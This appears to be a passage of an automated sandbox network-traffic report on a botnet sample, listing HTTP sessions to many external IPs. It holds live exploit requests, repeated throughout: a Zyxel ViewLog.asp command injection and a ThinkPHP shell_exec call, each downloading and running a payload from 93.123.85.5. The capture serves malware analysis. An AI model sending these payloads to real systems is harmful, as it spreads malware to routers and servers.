                                                              Nov 13, 2023 22:19:41.608206034 CET12496OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:43.591974020 CET12735OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:47.783365011 CET13338OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:55.718451977 CET14300OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:11.588246107 CET16302OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:44.095963955 CET20341OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              616192.168.2.235168862.29.122.388080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:40.612343073 CET12373OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              617192.168.2.235461462.29.12.1208080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:40.614139080 CET12374OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              618192.168.2.235102694.121.104.308080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:40.942039967 CET12478OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              619192.168.2.2340378112.170.10.6180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:41.109711885 CET12480OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:42.728168964 CET12624OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:44.615780115 CET12854OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:48.551388025 CET13375OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:56.230336905 CET14388OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:11.332268953 CET16297OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:42.049315929 CET20113OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              6231.128.207.2078080192.168.2.2356764
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:17.737457037 CET2302INHTTP/1.1 500 Server Error
                                                              Content-Length: 48
                                                              Date: Mon, 13 Nov 2023 21:18:17 GMT
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              620192.168.2.2352222112.127.62.16980
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:41.125116110 CET12481OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:41.450472116 CET12492INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:19:42 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              621192.168.2.2343608112.197.38.18180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:41.200815916 CET12484OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:41.605407953 CET12495INHTTP/1.0 400 Bad Request
                                                              Connection: Keep-Alive
                                                              Nov 13, 2023 22:19:41.605432987 CET12495INData Raw: 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e
                                                              Data Ascii: Keep-Alive: timeout=20Content-Type: text/html<h1>Bad Request</h1>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              622192.168.2.233745695.211.101.4080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:41.410763979 CET12490OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:41.710155010 CET12503INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:19:41 GMT
                                                              Server: Apache/2.4.41 (Ubuntu)
                                                              X-Frame-Options: sameorigin
                                                              X-XSS-Protection: 1; mode=block
                                                              Content-Length: 301
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              623192.168.2.234100295.217.186.16680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:41.432151079 CET12491OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:41.755203009 CET12534INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/plain; charset=utf-8
                                                              Connection: close
                                                              Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                              Data Ascii: 400 Bad Request


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              624192.168.2.235474695.22.38.6380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:41.556103945 CET12493OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:41.905963898 CET12557INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:19:41 GMT
                                                              Server: Apache
                                                              Vary: accept-language,accept-charset
                                                              Accept-Ranges: bytes
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Content-Language: en
                                                              Expires: Mon, 13 Nov 2023 21:19:41 GMT
                                                              Data Raw: 5b 61 6e 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 70 72 6f 63 65 73 73 69 6e 67 20 74 68 69 73 20 64 69 72 65 63 74 69 76 65 5d 5b 61 6e 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 70 72 6f 63 65 73 73 69 6e 67 20 74 68 69 73 20 64 69 72 65 63 74 69 76 65 5d 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 49 53 4f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 42 61 64 20 72 65 71 75 65 73 74 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 79 6f 75 40 65 78 61 6d 70 6c 65 2e 63 6f 6d 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 72 65 71 75 65 73 74 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0a 0a 20 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 28 6f 72 20 70 72 6f 78 79 29 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 0a 20 20 20 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 0a 0a 3c 2f 70 3e 0a 3c 70 3e 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 79 6f 75 40 65 78 61 6d 70 6c 65 2e 63 6f 6d 22 3e 77 65 62 6d 61 73 74 65 72 3c 2f 61 3e 2e 0a 0a 3c 2f 70 3e 0a 0a 3c 68 32 3e 45 72 72 6f 72 20 34 30 30 3c 2f 68 32 3e 0a 3c 61 64 64 72 65 73 73 3e 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 6c 6f 63 61 6c 68 6f 73 74 3c 2f 61 3e 3c 62 72 20 2f 3e 0a 20 20 0a 20 20 3c 73 70 61 6e 3e 4d 6f 6e 20 4e 6f 76 20 31 33 20 32 32 3a 31 39 3a 34 31 20 32 30 32 33 3c 62 72 20 2f 3e 0a 20 20 41 70 61 63 68 65 3c 2f 73 70 61 6e 3e 0a
                                                              Data Ascii: [an error occurred while processing this directive][an error occurred while processing this directive]<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Bad request!</title><link rev="made" href="mailto:you@example.com" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/*...*/--></style></head><body><h1>Bad request!</h1><p> Your browser (or proxy) sent a request that this server could not understand.</p><p>If you think this is a server error, please contactthe <a href="mailto:you@example.com">webmaster</a>.</p><h2>Error 400</h2><address> <a href="/">localhost</a><br /> <span>Mon Nov 13 22:19:41 2023<br /> Apache</span>
                                                              Nov 13, 2023 22:19:41.905982018 CET12558INData Raw: 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0a
                                                              Data Ascii: </address></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              625192.168.2.235021895.86.70.12780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:41.559884071 CET12493OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              626192.168.2.234420495.57.244.10480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:41.575500965 CET12494OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:41.951395035 CET12610INHTTP/1.1 200 OK
                                                              Nov 13, 2023 22:19:41.951689959 CET12610INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                              Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              627192.168.2.235228862.138.8.298080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:41.597300053 CET12495OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:41.908956051 CET12566INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:19:41 GMT
                                                              Server: Apache/2.4.54 (Debian)
                                                              Content-Length: 304
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
